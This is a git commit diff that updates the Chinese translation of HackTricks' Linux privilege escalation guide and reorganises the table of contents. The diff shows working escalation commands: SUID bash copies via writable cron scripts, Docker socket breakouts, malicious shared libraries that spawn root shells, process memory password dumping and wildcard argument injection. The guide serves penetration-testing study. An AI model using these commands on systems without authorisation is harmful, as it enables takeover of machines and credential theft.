mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/linux-hardening/privilege-escalation/README.md'] to zh
This commit is contained in:
parent
35d413ffc0
commit
e28b0f90d1
@ -793,6 +793,29 @@
|
||||
- [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
|
||||
- [iOS Exploiting](binary-exploitation/ios-exploiting.md)
|
||||
|
||||
# 🤖 AI
|
||||
- [AI Security](AI/README.md)
|
||||
- [AI Security Methodology](AI/AI-Deep-Learning.md)
|
||||
- [AI MCP Security](AI/AI-MCP-Servers.md)
|
||||
- [AI Model Data Preparation](AI/AI-Model-Data-Preparation-and-Evaluation.md)
|
||||
- [AI Models RCE](AI/AI-Models-RCE.md)
|
||||
- [AI Prompts](AI/AI-Prompts.md)
|
||||
- [AI Risk Frameworks](AI/AI-Risk-Frameworks.md)
|
||||
- [AI Supervised Learning Algorithms](AI/AI-Supervised-Learning-Algorithms.md)
|
||||
- [AI Unsupervised Learning Algorithms](AI/AI-Unsupervised-Learning-algorithms.md)
|
||||
- [AI Reinforcement Learning Algorithms](AI/AI-Reinforcement-Learning-Algorithms.md)
|
||||
- [LLM Training](AI/AI-llm-architecture/README.md)
|
||||
- [0. Basic LLM Concepts](AI/AI-llm-architecture/0.-basic-llm-concepts.md)
|
||||
- [1. Tokenizing](AI/AI-llm-architecture/1.-tokenizing.md)
|
||||
- [2. Data Sampling](AI/AI-llm-architecture/2.-data-sampling.md)
|
||||
- [3. Token Embeddings](AI/AI-llm-architecture/3.-token-embeddings.md)
|
||||
- [4. Attention Mechanisms](AI/AI-llm-architecture/4.-attention-mechanisms.md)
|
||||
- [5. LLM Architecture](AI/AI-llm-architecture/5.-llm-architecture.md)
|
||||
- [6. Pre-training & Loading models](AI/AI-llm-architecture/6.-pre-training-and-loading-models.md)
|
||||
- [7.0. LoRA Improvements in fine-tuning](AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md)
|
||||
- [7.1. Fine-Tuning for Classification](AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md)
|
||||
- [7.2. Fine-Tuning to follow instructions](AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md)
|
||||
|
||||
# 🔩 Reversing
|
||||
|
||||
- [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md)
|
||||
@ -850,17 +873,6 @@
|
||||
- [Low-Power Wide Area Network](todo/radio-hacking/low-power-wide-area-network.md)
|
||||
- [Pentesting BLE - Bluetooth Low Energy](todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md)
|
||||
- [Test LLMs](todo/test-llms.md)
|
||||
- [LLM Training](todo/llm-training-data-preparation/README.md)
|
||||
- [0. Basic LLM Concepts](todo/llm-training-data-preparation/0.-basic-llm-concepts.md)
|
||||
- [1. Tokenizing](todo/llm-training-data-preparation/1.-tokenizing.md)
|
||||
- [2. Data Sampling](todo/llm-training-data-preparation/2.-data-sampling.md)
|
||||
- [3. Token Embeddings](todo/llm-training-data-preparation/3.-token-embeddings.md)
|
||||
- [4. Attention Mechanisms](todo/llm-training-data-preparation/4.-attention-mechanisms.md)
|
||||
- [5. LLM Architecture](todo/llm-training-data-preparation/5.-llm-architecture.md)
|
||||
- [6. Pre-training & Loading models](todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md)
|
||||
- [7.0. LoRA Improvements in fine-tuning](todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md)
|
||||
- [7.1. Fine-Tuning for Classification](todo/llm-training-data-preparation/7.1.-fine-tuning-for-classification.md)
|
||||
- [7.2. Fine-Tuning to follow instructions](todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md)
|
||||
- [Burp Suite](todo/burp-suite.md)
|
||||
- [Other Web Tricks](todo/other-web-tricks.md)
|
||||
- [Interesting HTTP$$external:todo/interesting-http.md$$]()
|
||||
|
||||
@ -14,7 +14,7 @@ cat /etc/os-release 2>/dev/null # universal on modern systems
|
||||
```
|
||||
### 路径
|
||||
|
||||
如果您**对`PATH`变量中任何文件夹具有写入权限**,您可能能够劫持某些库或二进制文件:
|
||||
如果您**对`PATH`变量中的任何文件夹具有写入权限**,您可能能够劫持某些库或二进制文件:
|
||||
```bash
|
||||
echo $PATH
|
||||
```
|
||||
@ -33,7 +33,7 @@ uname -a
|
||||
searchsploit "Linux Kernel"
|
||||
```
|
||||
您可以在这里找到一个好的易受攻击内核列表和一些已经**编译的漏洞利用**: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) 和 [exploitdb sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits)。\
|
||||
其他可以找到一些**编译的漏洞利用**的网站:[https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries),[https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack)
|
||||
其他可以找到一些**编译的漏洞利用**的网站: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack)
|
||||
|
||||
要从该网站提取所有易受攻击的内核版本,您可以执行:
|
||||
```bash
|
||||
@ -49,7 +49,7 @@ curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2
|
||||
|
||||
### CVE-2016-5195 (DirtyCow)
|
||||
|
||||
Linux特权提升 - Linux内核 <= 3.19.0-73.8
|
||||
Linux权限提升 - Linux内核 <= 3.19.0-73.8
|
||||
```bash
|
||||
# make dirtycow stable
|
||||
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
|
||||
@ -123,7 +123,7 @@ cat /proc/sys/kernel/randomize_va_space 2>/dev/null
|
||||
```
|
||||
## Docker Breakout
|
||||
|
||||
如果您在 docker 容器内,可以尝试从中逃脱:
|
||||
如果你在一个docker容器内,你可以尝试逃离它:
|
||||
|
||||
{{#ref}}
|
||||
docker-security/
|
||||
@ -131,7 +131,7 @@ docker-security/
|
||||
|
||||
## Drives
|
||||
|
||||
检查 **已挂载和未挂载的内容**,以及挂载的位置和原因。如果有任何内容未挂载,您可以尝试挂载它并检查私人信息。
|
||||
检查**已挂载和未挂载的内容**,以及它们的位置和原因。如果有任何未挂载的内容,你可以尝试挂载它并检查私人信息。
|
||||
```bash
|
||||
ls /dev 2>/dev/null | grep -i "sd"
|
||||
cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null
|
||||
@ -144,11 +144,11 @@ grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc
|
||||
```bash
|
||||
which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
|
||||
```
|
||||
还要检查是否**安装了任何编译器**。如果您需要使用某个内核漏洞,这很有用,因为建议在您将要使用它的机器上(或在类似的机器上)进行编译。
|
||||
还要检查是否**安装了任何编译器**。如果您需要使用某个内核漏洞,这很有用,因为建议在您将要使用它的机器上(或类似的机器上)进行编译。
|
||||
```bash
|
||||
(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
|
||||
```
|
||||
### 易受攻击的软件安装
|
||||
### 安装的易受攻击软件
|
||||
|
||||
检查**已安装软件包和服务的版本**。可能存在某些旧版的Nagios(例如),可以被利用来提升权限……\
|
||||
建议手动检查更可疑的已安装软件的版本。
|
||||
@ -158,18 +158,18 @@ rpm -qa #Centos
|
||||
```
|
||||
如果您可以访问机器的SSH,您还可以使用 **openVAS** 检查机器上安装的过时和易受攻击的软件。
|
||||
|
||||
> [!NOTE] > _请注意,这些命令将显示大量信息,其中大多数将是无用的,因此建议使用一些应用程序,如OpenVAS或类似工具,检查任何已安装的软件版本是否易受已知漏洞的攻击_
|
||||
> [!NOTE] > _请注意,这些命令将显示大量信息,其中大部分将是无用的,因此建议使用一些应用程序,如OpenVAS或类似工具,检查任何已安装的软件版本是否易受已知漏洞的攻击_
|
||||
|
||||
## Processes
|
||||
|
||||
查看 **正在执行的进程**,并检查是否有任何进程 **拥有超过应有的权限**(可能是由root执行的tomcat?)
|
||||
查看 **正在执行的进程**,并检查是否有任何进程具有 **超出其应有的权限**(例如,是否有由root执行的tomcat?)
|
||||
```bash
|
||||
ps aux
|
||||
ps -ef
|
||||
top -n 1
|
||||
```
|
||||
始终检查可能正在运行的 [**electron/cef/chromium debuggers**,您可以利用它来提升权限](electron-cef-chromium-debugger-abuse.md)。**Linpeas** 通过检查进程命令行中的 `--inspect` 参数来检测这些。\
|
||||
还要**检查您对进程二进制文件的权限**,也许您可以覆盖某个用户的文件。
|
||||
还要**检查您对进程二进制文件的权限**,也许您可以覆盖某个用户。
|
||||
|
||||
### 进程监控
|
||||
|
||||
@ -215,7 +215,7 @@ done
|
||||
```
|
||||
#### /proc/$pid/maps & /proc/$pid/mem
|
||||
|
||||
对于给定的进程 ID,**maps 显示该进程的**虚拟地址空间内如何映射内存;它还显示**每个映射区域的权限**。**mem** 伪文件**暴露了进程的内存本身**。通过**maps** 文件,我们知道哪些**内存区域是可读的**及其偏移量。我们使用这些信息**在 mem 文件中查找并将所有可读区域转储到文件中**。
|
||||
对于给定的进程 ID,**maps 显示该进程的** 虚拟地址空间内如何映射内存;它还显示 **每个映射区域的权限**。**mem** 伪文件 **暴露了进程的内存本身**。通过 **maps** 文件,我们知道哪些 **内存区域是可读的** 及其偏移量。我们使用这些信息 **在 mem 文件中查找并将所有可读区域转储到文件中**。
|
||||
```bash
|
||||
procdump()
|
||||
(
|
||||
@ -237,7 +237,7 @@ strings /dev/mem -n10 | grep -i PASS
|
||||
```
|
||||
### ProcDump for linux
|
||||
|
||||
ProcDump 是 Sysinternals 工具套件中经典 ProcDump 工具的 Linux 版本。可以在 [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux) 获取。
|
||||
ProcDump 是 Sysinternals 工具套件中经典 ProcDump 工具的 Linux 版本。获取地址在 [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)
|
||||
```
|
||||
procdump -p 1714
|
||||
|
||||
@ -290,14 +290,14 @@ strings *.dump | grep -i password
|
||||
|
||||
该工具 [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) 将 **从内存中窃取明文凭据** 和一些 **知名文件**。它需要 root 权限才能正常工作。
|
||||
|
||||
| 特性 | 进程名称 |
|
||||
| ------------------------------------------------ | -------------------- |
|
||||
| GDM 密码(Kali 桌面,Debian 桌面) | gdm-password |
|
||||
| Gnome 密钥环(Ubuntu 桌面,ArchLinux 桌面) | gnome-keyring-daemon |
|
||||
| LightDM(Ubuntu 桌面) | lightdm |
|
||||
| VSFTPd(活动 FTP 连接) | vsftpd |
|
||||
| Apache2(活动 HTTP 基本认证会话) | apache2 |
|
||||
| OpenSSH(活动 SSH 会话 - Sudo 使用) | sshd: |
|
||||
| 特性 | 进程名称 |
|
||||
| ------------------------------------------------ | --------------------- |
|
||||
| GDM 密码(Kali 桌面,Debian 桌面) | gdm-password |
|
||||
| Gnome Keyring(Ubuntu 桌面,ArchLinux 桌面) | gnome-keyring-daemon |
|
||||
| LightDM(Ubuntu 桌面) | lightdm |
|
||||
| VSFTPd(活动 FTP 连接) | vsftpd |
|
||||
| Apache2(活动 HTTP 基本认证会话) | apache2 |
|
||||
| OpenSSH(活动 SSH 会话 - Sudo 使用) | sshd: |
|
||||
|
||||
#### Search Regexes/[truffleproc](https://github.com/controlplaneio/truffleproc)
|
||||
```bash
|
||||
@ -325,10 +325,10 @@ cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/nul
|
||||
|
||||
例如,在 _/etc/crontab_ 中可以找到 PATH: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_
|
||||
|
||||
(_注意用户 "user" 对 /home/user 具有写权限_)
|
||||
(_注意用户 "user" 对 /home/user 具有写入权限_)
|
||||
|
||||
如果在这个 crontab 中,root 用户尝试执行某个命令或脚本而没有设置路径。例如: _\* \* \* \* root overwrite.sh_\
|
||||
然后,您可以通过使用:
|
||||
然后,您可以通过使用获得 root shell:
|
||||
```bash
|
||||
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
|
||||
#Wait cron job to be executed
|
||||
@ -340,7 +340,7 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
|
||||
```bash
|
||||
rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script
|
||||
```
|
||||
**如果通配符前面有一个路径,比如** _**/some/path/\***_ **,那么它就不容易受到攻击(即使是** _**./\***_ **也不行)。**
|
||||
**如果通配符前面有一个路径,比如** _**/some/path/\***_ **,那么它就不容易受到攻击(即使** _**./\***_ **也不行)。**
|
||||
|
||||
阅读以下页面以获取更多通配符利用技巧:
|
||||
|
||||
@ -356,15 +356,15 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
|
||||
#Wait until it is executed
|
||||
/tmp/bash -p
|
||||
```
|
||||
如果由 root 执行的脚本使用一个 **您拥有完全访问权限的目录**,那么删除该文件夹并 **创建一个指向另一个由您控制的脚本的符号链接文件夹** 可能会很有用。
|
||||
如果由 root 执行的脚本使用一个 **您拥有完全访问权限的目录**,那么删除该文件夹并 **创建一个指向另一个文件夹的符号链接**,该文件夹提供由您控制的脚本,可能会很有用。
|
||||
```bash
|
||||
ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>
|
||||
```
|
||||
### Frequent cron jobs
|
||||
|
||||
您可以监控进程,以搜索每 1、2 或 5 分钟执行的进程。也许您可以利用这一点来提升权限。
|
||||
您可以监控进程以搜索每 1、2 或 5 分钟执行的进程。也许您可以利用它来提升权限。
|
||||
|
||||
例如,要**每 0.1 秒监控 1 分钟**,**按执行次数较少的命令排序**并删除执行次数最多的命令,您可以执行:
|
||||
例如,要**每 0.1 秒监控 1 分钟**,**按执行次数较少的命令排序**并删除执行次数最多的命令,您可以这样做:
|
||||
```bash
|
||||
for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;
|
||||
```
|
||||
@ -372,7 +372,7 @@ for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; do
|
||||
|
||||
### 隐形的 cron 作业
|
||||
|
||||
可以创建一个 cron 作业 **在注释后放置一个回车符**(没有换行符),并且 cron 作业将正常工作。示例(注意回车符):
|
||||
可以创建一个 cron 作业 **在注释后放置回车符**(没有换行符),并且 cron 作业将正常工作。示例(注意回车符):
|
||||
```bash
|
||||
#This is a comment inside a cron config file\r* * * * * echo "Surprise!"
|
||||
```
|
||||
@ -393,7 +393,7 @@ for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; do
|
||||
```bash
|
||||
systemctl show-environment
|
||||
```
|
||||
如果您发现您可以在路径的任何文件夹中**写入**,您可能能够**提升权限**。您需要搜索**在服务配置**文件中使用的**相对路径**,例如:
|
||||
如果您发现可以在路径的任何文件夹中**写入**,则可能能够**提升权限**。您需要搜索**在服务配置**文件中使用的**相对路径**,例如:
|
||||
```bash
|
||||
ExecStart=faraday-server
|
||||
ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I'
|
||||
@ -413,20 +413,20 @@ systemctl list-timers --all
|
||||
```
|
||||
### 可写定时器
|
||||
|
||||
如果您可以修改定时器,则可以使其执行某些 systemd.unit 的实例(如 `.service` 或 `.target`)
|
||||
如果您可以修改定时器,则可以使其执行一些 systemd.unit 的实例(例如 `.service` 或 `.target`)
|
||||
```bash
|
||||
Unit=backdoor.service
|
||||
```
|
||||
在文档中,您可以阅读到单位的定义:
|
||||
|
||||
> 当此计时器到期时要激活的单位。参数是单位名称,其后缀不是“.timer”。如果未指定,则此值默认为与计时器单位同名的服务,除了后缀外。(见上文。)建议激活的单位名称和计时器单位的名称在后缀之外是相同的。
|
||||
> 当此计时器到期时要激活的单位。参数是单位名称,其后缀不是“.timer”。如果未指定,则此值默认为与计时器单位同名的服务,除了后缀外。(见上文。)建议激活的单位名称和计时器单位的单位名称在名称上保持一致,除了后缀。
|
||||
|
||||
因此,要滥用此权限,您需要:
|
||||
|
||||
- 找到某个 systemd 单元(如 `.service`),该单元正在 **执行一个可写的二进制文件**
|
||||
- 找到某个 systemd 单元,该单元正在 **执行一个相对路径**,并且您对 **systemd PATH** 具有 **可写权限**(以冒充该可执行文件)
|
||||
- 找到某个 systemd 单元,该单元正在 **执行一个相对路径**,并且您对 **systemd PATH** 具有 **可写权限**(以伪装该可执行文件)
|
||||
|
||||
**了解有关计时器的更多信息,请使用 `man systemd.timer`。**
|
||||
**了解更多关于计时器的信息,请使用 `man systemd.timer`。**
|
||||
|
||||
### **启用计时器**
|
||||
|
||||
@ -446,10 +446,10 @@ Unix 域套接字 (UDS) 使得在客户端-服务器模型中同一台或不同
|
||||
**通过 `man systemd.socket` 了解更多关于套接字的信息。** 在此文件中,可以配置几个有趣的参数:
|
||||
|
||||
- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: 这些选项不同,但总结用于 **指示它将监听的位置**(AF_UNIX 套接字文件的路径,监听的 IPv4/6 和/或端口号等)
|
||||
- `Accept`: 接受一个布尔参数。如果 **true**,则为每个传入连接 **生成一个服务实例**,并且仅将连接套接字传递给它。如果 **false**,则所有监听套接字本身 **传递给启动的服务单元**,并且仅为所有连接生成一个服务单元。对于数据报套接字和 FIFO,此值被忽略,单个服务单元无条件处理所有传入流量。**默认为 false**。出于性能原因,建议仅以适合 `Accept=no` 的方式编写新守护进程。
|
||||
- `Accept`: 接受一个布尔参数。如果 **true**,则为每个传入连接 **生成一个服务实例**,并且仅将连接套接字传递给它。如果 **false**,则所有监听套接字本身 **传递给启动的服务单元**,并且仅为所有连接生成一个服务单元。对于数据报套接字和 FIFO,此值被忽略,因为单个服务单元无条件处理所有传入流量。**默认为 false**。出于性能原因,建议仅以适合 `Accept=no` 的方式编写新守护进程。
|
||||
- `ExecStartPre`, `ExecStartPost`: 接受一个或多个命令行,这些命令在监听 **套接字**/FIFO 被 **创建** 和绑定之前或之后 **执行**。命令行的第一个标记必须是绝对文件名,后面跟着进程的参数。
|
||||
- `ExecStopPre`, `ExecStopPost`: 在监听 **套接字**/FIFO 被 **关闭** 和移除之前或之后 **执行** 的额外 **命令**。
|
||||
- `Service`: 指定 **在传入流量** 上 **激活** 的 **服务** 单元名称。此设置仅允许用于 Accept=no 的套接字。默认为与套接字同名的服务(后缀被替换)。在大多数情况下,不需要使用此选项。
|
||||
- `Service`: 指定 **服务** 单元名称 **以激活** 在 **传入流量** 上。此设置仅允许用于 Accept=no 的套接字。默认为与套接字同名的服务(后缀被替换)。在大多数情况下,不需要使用此选项。
|
||||
|
||||
### 可写的 .socket 文件
|
||||
|
||||
@ -481,7 +481,7 @@ socket-command-injection.md
|
||||
|
||||
### HTTP 套接字
|
||||
|
||||
请注意,可能有一些 **监听 HTTP** 请求的 **套接字**(_我不是在谈论 .socket 文件,而是充当 unix 套接字的文件_)。您可以通过以下方式检查:
|
||||
请注意,可能有一些 **监听 HTTP** 请求的 **套接字**(_我不是在谈论 .socket 文件,而是作为 unix 套接字的文件_)。您可以通过以下方式检查:
|
||||
```bash
|
||||
curl --max-time 2 --unix-socket /pat/to/socket/files http:/index
|
||||
```
|
||||
@ -489,11 +489,11 @@ curl --max-time 2 --unix-socket /pat/to/socket/files http:/index
|
||||
|
||||
### 可写的 Docker 套接字
|
||||
|
||||
Docker 套接字,通常位于 `/var/run/docker.sock`,是一个关键文件,应该被保护。默认情况下,它对 `root` 用户和 `docker` 组的成员是可写的。拥有对这个套接字的写入权限可能导致特权升级。以下是如何做到这一点的分解,以及在 Docker CLI 不可用时的替代方法。
|
||||
Docker 套接字,通常位于 `/var/run/docker.sock`,是一个关键文件,应该被保护。默认情况下,它对 `root` 用户和 `docker` 组的成员是可写的。拥有对这个套接字的写访问权限可能导致权限提升。以下是如何做到这一点的分解,以及在 Docker CLI 不可用时的替代方法。
|
||||
|
||||
#### **使用 Docker CLI 进行特权升级**
|
||||
#### **使用 Docker CLI 提升权限**
|
||||
|
||||
如果你对 Docker 套接字具有写入权限,可以使用以下命令进行特权升级:
|
||||
如果你对 Docker 套接字具有写访问权限,可以使用以下命令提升权限:
|
||||
```bash
|
||||
docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
|
||||
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
|
||||
@ -532,7 +532,7 @@ Connection: Upgrade
|
||||
Upgrade: tcp
|
||||
```
|
||||
|
||||
在设置好 `socat` 连接后,您可以直接在容器中执行命令,拥有对主机文件系统的根级别访问权限。
|
||||
在设置 `socat` 连接后,您可以直接在容器中执行命令,具有对主机文件系统的根级别访问权限。
|
||||
|
||||
### 其他
|
||||
|
||||
@ -564,7 +564,7 @@ runc-privilege-escalation.md
|
||||
|
||||
D-Bus 是一个复杂的 **进程间通信 (IPC) 系统**,使应用程序能够高效地交互和共享数据。它是为现代 Linux 系统设计的,提供了一个强大的框架,用于不同形式的应用程序通信。
|
||||
|
||||
该系统灵活多变,支持基本的 IPC,增强了进程之间的数据交换,类似于 **增强的 UNIX 域套接字**。此外,它有助于广播事件或信号,促进系统组件之间的无缝集成。例如,来自蓝牙守护进程的关于来电的信号可以促使音乐播放器静音,从而提升用户体验。此外,D-Bus 支持远程对象系统,简化了应用程序之间的服务请求和方法调用,简化了传统上复杂的过程。
|
||||
该系统灵活多变,支持基本的 IPC,增强了进程之间的数据交换,类似于 **增强的 UNIX 域套接字**。此外,它有助于广播事件或信号,促进系统组件之间的无缝集成。例如,来自蓝牙守护进程的关于来电的信号可以提示音乐播放器静音,从而增强用户体验。此外,D-Bus 支持远程对象系统,简化了应用程序之间的服务请求和方法调用,简化了传统上复杂的过程。
|
||||
|
||||
D-Bus 基于 **允许/拒绝模型**,根据匹配策略规则的累积效果管理消息权限(方法调用、信号发射等)。这些策略指定与总线的交互,可能通过利用这些权限来允许权限提升。
|
||||
|
||||
@ -629,7 +629,7 @@ timeout 1 tcpdump
|
||||
|
||||
### 通用枚举
|
||||
|
||||
检查 **who** 你是,您拥有的 **privileges**,系统中有哪些 **users**,哪些可以 **login**,哪些具有 **root privileges**:
|
||||
检查 **你是谁**,你拥有的 **权限**,系统中有哪些 **用户**,哪些可以 **登录**,哪些具有 **root 权限**:
|
||||
```bash
|
||||
#Info about me
|
||||
id || (whoami && groups) 2>/dev/null
|
||||
@ -653,7 +653,7 @@ gpg --list-keys 2>/dev/null
|
||||
```
|
||||
### Big UID
|
||||
|
||||
某些Linux版本受到一个漏洞的影响,该漏洞允许**UID > INT_MAX**的用户提升权限。更多信息:[here](https://gitlab.freedesktop.org/polkit/polkit/issues/74),[here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) 和 [here](https://twitter.com/paragonsec/status/1071152249529884674)。\
|
||||
一些Linux版本受到一个漏洞的影响,允许**UID > INT_MAX**的用户提升权限。更多信息:[here](https://gitlab.freedesktop.org/polkit/polkit/issues/74),[here](https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh) 和 [here](https://twitter.com/paragonsec/status/1071152249529884674)。\
|
||||
**利用它**使用:**`systemd-run -t /bin/bash`**
|
||||
|
||||
### Groups
|
||||
@ -683,7 +683,7 @@ grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/logi
|
||||
```
|
||||
### 已知密码
|
||||
|
||||
如果您**知道环境中的任何密码**,请尝试使用该密码**以每个用户身份登录**。
|
||||
如果您**知道环境中的任何密码**,请尝试使用该密码**登录每个用户**。
|
||||
|
||||
### Su Brute
|
||||
|
||||
@ -694,11 +694,11 @@ grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/logi
|
||||
|
||||
### $PATH
|
||||
|
||||
如果您发现可以**在$PATH的某个文件夹内写入**,您可能能够通过**在可写文件夹内创建一个后门**,其名称为将由其他用户(理想情况下是root)执行的某个命令,并且该命令**不是从位于$PATH中您可写文件夹之前的文件夹加载的**,来提升权限。
|
||||
如果您发现可以**在 $PATH 的某个文件夹内写入**,您可能能够通过**在可写文件夹内创建一个后门**,其名称为将由其他用户(理想情况下是 root)执行的某个命令,并且该命令**不是从位于您可写文件夹之前的文件夹加载的**,来提升权限。
|
||||
|
||||
### SUDO 和 SUID
|
||||
|
||||
您可能被允许使用sudo执行某些命令,或者它们可能具有suid位。使用以下命令检查:
|
||||
您可能被允许使用 sudo 执行某些命令,或者它们可能具有 suid 位。使用以下命令检查:
|
||||
```bash
|
||||
sudo -l #Check commands you can execute with sudo
|
||||
find / -perm -4000 2>/dev/null #Find all SUID binaries
|
||||
@ -738,7 +738,7 @@ sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
|
||||
```
|
||||
### Sudo 执行绕过路径
|
||||
|
||||
**跳转** 以读取其他文件或使用 **符号链接**。例如在 sudoers 文件中: _hacker10 ALL= (root) /bin/less /var/log/\*_
|
||||
**跳转** 以读取其他文件或使用 **符号链接**。例如在 sudoers 文件中: _hacker10 ALL= (root) /bin/less /var/log/\*_
|
||||
```bash
|
||||
sudo less /var/logs/anything
|
||||
less>:e /etc/shadow #Jump to read other files using privileged less
|
||||
@ -769,7 +769,7 @@ sudo less
|
||||
|
||||
### 带命令路径的SUID二进制文件
|
||||
|
||||
如果**suid**二进制文件**执行另一个命令并指定路径**,那么你可以尝试**导出一个名为该suid文件调用的命令的函数**。
|
||||
如果**suid**二进制文件**执行另一个命令并指定路径**,那么你可以尝试**导出一个函数**,其名称与suid文件调用的命令相同。
|
||||
|
||||
例如,如果一个suid二进制文件调用_**/usr/sbin/service apache2 start**_,你需要尝试创建该函数并导出它:
|
||||
```bash
|
||||
@ -787,7 +787,7 @@ export -f /usr/sbin/service
|
||||
- 对于真实用户ID(_ruid_)与有效用户ID(_euid_)不匹配的可执行文件,加载器会忽略**LD_PRELOAD**。
|
||||
- 对于具有suid/sgid的可执行文件,仅在标准路径中且也具有suid/sgid的库会被预加载。
|
||||
|
||||
如果你有能力使用`sudo`执行命令,并且`sudo -l`的输出包含语句**env_keep+=LD_PRELOAD**,则可能发生权限提升。这种配置允许**LD_PRELOAD**环境变量持续存在并被识别,即使在使用`sudo`运行命令时,这可能导致以提升的权限执行任意代码。
|
||||
如果你有能力使用`sudo`执行命令,并且`sudo -l`的输出包含语句**env_keep+=LD_PRELOAD**,则可能发生权限提升。此配置允许**LD_PRELOAD**环境变量持续存在并被识别,即使在使用`sudo`运行命令时,这可能导致以提升的权限执行任意代码。
|
||||
```
|
||||
Defaults env_keep += LD_PRELOAD
|
||||
```
|
||||
@ -840,9 +840,9 @@ sudo LD_LIBRARY_PATH=/tmp <COMMAND>
|
||||
```bash
|
||||
strace <SUID-BINARY> 2>&1 | grep -i -E "open|access|no such file"
|
||||
```
|
||||
例如,遇到类似 _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (没有这样的文件或目录)"_ 的错误提示了潜在的利用可能性。
|
||||
例如,遇到类似 _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (没有这样的文件或目录)"_ 的错误提示可能表明存在利用的潜力。
|
||||
|
||||
为了利用这一点,可以创建一个 C 文件,比如 _"/path/to/.config/libcalc.c"_,其中包含以下代码:
|
||||
为了利用这一点,可以创建一个 C 文件,例如 _"/path/to/.config/libcalc.c"_,其中包含以下代码:
|
||||
```c
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
@ -859,7 +859,7 @@ system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
|
||||
```bash
|
||||
gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c
|
||||
```
|
||||
最后,运行受影响的 SUID 二进制文件应该会触发漏洞,从而可能导致系统被攻陷。
|
||||
最后,运行受影响的 SUID 二进制文件应该触发漏洞,从而可能导致系统被攻陷。
|
||||
|
||||
## 共享对象劫持
|
||||
```bash
|
||||
@ -894,7 +894,7 @@ system("/bin/bash -p");
|
||||
|
||||
[**GTFOBins**](https://gtfobins.github.io) 是一个经过整理的 Unix 二进制文件列表,攻击者可以利用这些文件绕过本地安全限制。[**GTFOArgs**](https://gtfoargs.github.io/) 则是针对只能 **注入参数** 的命令的情况。
|
||||
|
||||
